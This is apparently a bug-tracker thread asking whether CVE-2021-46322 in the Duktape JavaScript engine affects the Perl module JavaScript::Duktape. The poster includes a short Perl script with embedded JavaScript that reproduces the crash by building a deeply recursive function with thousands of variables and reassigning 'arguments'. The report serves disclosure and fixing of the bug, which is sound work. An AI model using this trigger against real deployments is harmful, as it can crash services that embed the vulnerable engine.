Does CVE-2021-46322 affect this?

[robrwo]

Does CVE-2021-46322 affect this? See svaarala/duktape#2448 which should affect all v2.2 versions. The Changes file says

2.3.0 2017 2017-12-16
        - update duktape version to v 2.2.0

[robrwo]

I verified that this is an issue:

use JavaScript::Duktape;

my $js = JavaScript::Duktape->new();

$js->eval( << "POS"
function JSEtest() {
    var src = [];
    var i;

    src.push('(function test() {');
    for (i = 0; i < 1e4; i++) {
        src.push('var x' + i + ' = ' + i + ';');
    }
    src.push('var arguments = test(); return "dummy"; })');
    src = src.join('');

    var f = eval(src)(src);

    try {
        f();
    } catch (e) {
        print(e.name + ': ' + e.message);
    }

    print('still here');
}

try {
    JSEtest();
} catch (e) {
    print(e.stack || e);
}

POS

    );